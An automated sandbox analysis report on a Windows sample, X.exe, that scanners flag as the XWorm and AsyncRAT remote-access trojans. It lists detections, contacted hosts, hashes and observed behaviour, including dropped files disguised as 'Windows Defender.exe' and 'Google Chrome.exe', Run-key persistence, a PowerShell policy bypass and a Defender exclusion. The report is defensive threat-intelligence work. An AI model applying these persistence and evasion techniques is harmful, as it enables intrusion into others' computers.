                        DLL Side-Loading                        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528947 Sample: X.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 64 ip-api.com 2->64 66 time.windows.com 2->66 68 3 other IPs or domains 2->68 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for dropped file 2->76 78 19 other signatures 2->78 9 X.exe 2 5 2->9         started        13 Windows Defender.exe 2->13         started        15 Windows Defender.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 58 C:\Users\user\...\Windows Defender.exe, PE32 9->58 dropped 60 C:\Users\user\AppData\...behaviorgraphoogle Chrome.exe, PE32 9->60 dropped 62 C:\Users\user\AppData\Local\...\X.exe.log, CSV 9->62 dropped 86 Creates multiple autostart registry keys 9->86 88 Bypasses PowerShell execution policy 9->88 90 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->90 92 2 other signatures 9->92 19 Windows Defender.exe 14 3 9->19         started        23 Google Chrome.exe 9->23         started        25 powershell.exe 23 9->25         started        27 2 other processes 9->27 signatures6 process7 dnsIp8 70 ip-api.com 208.95.112.1, 49805, 49949, 80 TUT-ASUS United States 19->70 80 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 19->80 82 Adds a directory exclusion to Windows Defender 19->82 29 powershell.exe 23 19->29         started        32 powershell.exe 19->32         started        34 powershell.exe 19->34         started        36 powershell.exe 23->36         started        38 powershell.exe 23->38         started        84 Loading BitLocker PowerShell Module 25->84 40 conhost.exe 25->40         started        42 conhost.exe 27->42         started        44 conhost.exe 27->44         started        46 chcp.com 27->46         started        signatures9 process10 signatures11 94 Loading BitLocker PowerShell Module 29->94 48 conhost.exe 29->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 conhost.exe 36->54         started        56 conhost.exe 38->56         started        process12

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        X.exe63%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                        X.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Google Chrome.exe92%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        C:\Users\user\AppData\Local\Temp\Windows Defender.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://nuget.org/NuGet.exe0%URL Reputationsafe
                        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                        http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                        http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                        https://contoso.com/0%URL Reputationsafe
                        https://nuget.org/nuget.exe0%URL Reputationsafe
                        https://contoso.com/License0%URL Reputationsafe
                        https://contoso.com/Icon0%URL Reputationsafe
                        https://aka.ms/pscore680%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                        http://ip-api.com/line/?fields=hosting0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        s-part-0017.t-0009.fb-t-msedge.net
                        		13.107.253.45
                        		truefalse
                          		unknown
                          ip-api.com
                          		208.95.112.1
                          		truetrue
                            		unknown
                            time.windows.com
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              22.ip.gl.ply.ggtrue
                                		unknown
                                http://ip-api.com/line/?fields=hostingfalse
                                • URL Reputation: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://crl.mpowershell.exe, 0000001A.00000002.2938908056.000001D0F6095000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://crl.microsoqx8powershell.exe, 00000011.00000002.2228425709.00000190DD0C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1423076041.000002539DDA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E376A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 0000001A.00000002.2977692716.000001D0F8241000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://contoso.com/powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1453442601.00000253ADBF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1639554132.000002D22106F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1756386840.000001D510070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2141274912.00000190D484F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2276113890.0000021E474EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.microsoft.copowershell.exe, 00000006.00000002.1685428644.000002D229630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1685721301.000002D22983D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.micpowershell.exe, 00000011.00000002.2232854236.00000190DD0EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contoso.com/Iconpowershell.exe, 0000001A.00000002.2855993611.000001D090067000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.microsoft.powershell.exe, 00000009.00000002.1815371128.000001D5759FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1423076041.000002539DB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1503326387.000002D211001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1553072201.000001D500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1810622083.00000190C47E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1907092950.0000021E37481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2303227830.000001D080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2493859765.0000026F59571000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://github.com/Pester/Pesterpowershell.exe, 0000001C.00000002.2493859765.0000026F597C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.95.112.1
                                                		ip-api.comUnited States
                                                		53334TUT-ASUStrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1528947
                                                Start date and time:2024-10-08 14:01:12 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 17s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:31
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Sample name:X.exe
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winEXE@36/35@3/1
                                                EGA Information:Failed
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 113
                                                • Number of non-executed functions: 7
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 13.95.65.251
                                                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target Google Chrome.exe, PID 1168 because it is empty
                                                • Execution Graph export aborted for target Google Chrome.exe, PID 1888 because it is empty
                                                • Execution Graph export aborted for target Windows Defender.exe, PID 1180 because it is empty
                                                • Execution Graph export aborted for target Windows Defender.exe, PID 6932 because it is empty
                                                • Execution Graph export aborted for target X.exe, PID 6696 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2056 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 2908 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 4472 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 4876 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 6684 because it is empty
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • VT rate limit hit for: X.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                08:02:21API Interceptor125x Sleep call for process: powershell.exe modified
                                                14:02:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                14:02:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                14:03:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                14:03:08AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Temp\Google Chrome.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                208.95.112.1Windows Defender.exeGet hashmaliciousXWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                • ip-api.com/line/?fields=hosting

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.comWindows Defender.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                http://tcaconnect.ac-page.com/toronto-construction-association-inc/Get hashmaliciousUnknownBrowse
                                                • 51.77.64.70
                                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                s-part-0017.t-0009.fb-t-msedge.netWiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 13.107.253.45
                                                5rVhexjLCx.exeGet hashmaliciousStealcBrowse
                                                • 13.107.253.45
                                                https://email.oxblue.com/e3t/Ctc/Q+113/cdDrv04/VXdfjN46m5dxW4GJlKB4fd0DdW2sbCLr5lTFq6N7Hm8xT3qgyTW7Y8-PT6lZ3lzW1ccS1H8Y8rzXW1hrlTV77h1NhW5_pVzH8bsnn6W1PWxqV8D5TN_W4_z5yx2Cz_4sMrZF-GqDHzcW8pZQ3N3BhYgKW3tmwg72n4TxDW4fS46V1-s7dgW57YVF64HfrMMW2BxxC75X21XdW1nBYw_1PMVGyW8s_YKQ6BTQZmW8wDJ4k3-yNbbW2_BGfy66mfVdW937hqt5kq1CcW4XD3mN54BQSWW4G8TK98NTx7zW74frv25zlZbQW5ztJ6n6fGJFrMSqBjr36qwYW2tk9Xh21wMKrW5RXwDq1M2mmrW3nyq_P20wBvNN8-tVH1nqcD1W5m3Vz04sj9CQf2ygfDq04Get hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                original.emlGet hashmaliciousTycoon2FABrowse
                                                • 13.107.253.45
                                                https://emmaway-my.sharepoint.com/:f:/g/personal/jessica_emmaway_uk/Eodal0AmsKFKtMeEeNJG0V0B3d0_hcKMrsOYen-8p5FxhQ?e=bBSdNWGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                http://www.twbcompany.comGet hashmaliciousUnknownBrowse
                                                • 13.107.253.45
                                                #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 13.107.253.45
                                                https://pub-2fd40031391d4470a8c3c1090493deca.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 13.107.253.45
                                                http://patjimmy323.wixsite.com/my-site-1/Get hashmaliciousHTMLPhisherBrowse
                                                • 13.107.253.45
                                                http://hiotdakia.wixsite.com/p-a-y-h-2-o/blank/Get hashmaliciousUnknownBrowse
                                                • 13.107.253.45

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TUT-ASUSWindows Defender.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                scan_88845i.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Cotizaci#U00f3n P13000996 pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                • 208.95.112.1
                                                z71htmivzKAUpOkr2J.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                RFQ 002593810024350.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                DHL_Doc.9787653446578978656879764534576879764545766456.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                PixpFUv4G7.exeGet hashmaliciousQuasar, XWormBrowse
                                                • 208.95.112.1

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                C:\Users\user\AppData\Local\Temp\Windows Defender.exeWindows Defender.exeGet hashmaliciousXWormBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Google Chrome.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Google Chrome.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Defender.exe.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\Temp\Windows Defender.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\X.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):654
                                                  Entropy (8bit):5.380476433908377
                                                  Encrypted:false
                                                  SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                  MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                  SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                  SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                  SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                  Malicious:true
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Preview:@...e...........................................................

                                                  C:\Users\user\AppData\Local\Temp\Google Chrome.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\X.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):178176
                                                  Entropy (8bit):6.164094369981057
                                                  Encrypted:false
                                                  SSDEEP:3072:B0wUOcJbg09AOawiPz4NpVq8BxFRzaqF+o2GQJ7/JzqVfGvf:C1bqzgVqwlL
                                                  MD5:D30B86E01EF85AA5FCF4292CB295F00F
                                                  SHA1:3EDB6178C1BB864088E68731032D011CD4C81BE2
                                                  SHA-256:92B901C9F8FDA1FB17CA7647DD16825C29FF4FDA2B6C4B15534426F95920BA6C
                                                  SHA-512:B7765C81111B717667335E8A2349C58EFDB3C7A8F376EB07FF27E2DEC29DB2529CD8353EBFC9F09AE88336243EAEA30EAC0A2FD22E66E8F27AEB9FB9F06CC2EF
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P.f............................N.... ... ....@.. ....................... ............@.....................................W.... ..r............................................................................ ............... ..H............text...T.... ...................... ..`.rsrc...r.... ......................@..@.reloc..............................@..B................0.......H........c..H.......&.....................................................(....*.r...p*. .(T.*..(....*.r#..p*. *p{.*.s.........s.........s.........s.........*.rE..p*. %kU.*.rg..p*. ....*.r...p*. X...*.r...p*. ~.H.*.r...p*. E/..*..((...*.r...p*.r...p*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(....&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r9..p*.r[..p*. ..L.*.r}..p*. ....*.r...p*. ..'.*.r...p*. S...*.r...p*. ....*.r...p*.r'..p*. d...*.rI.

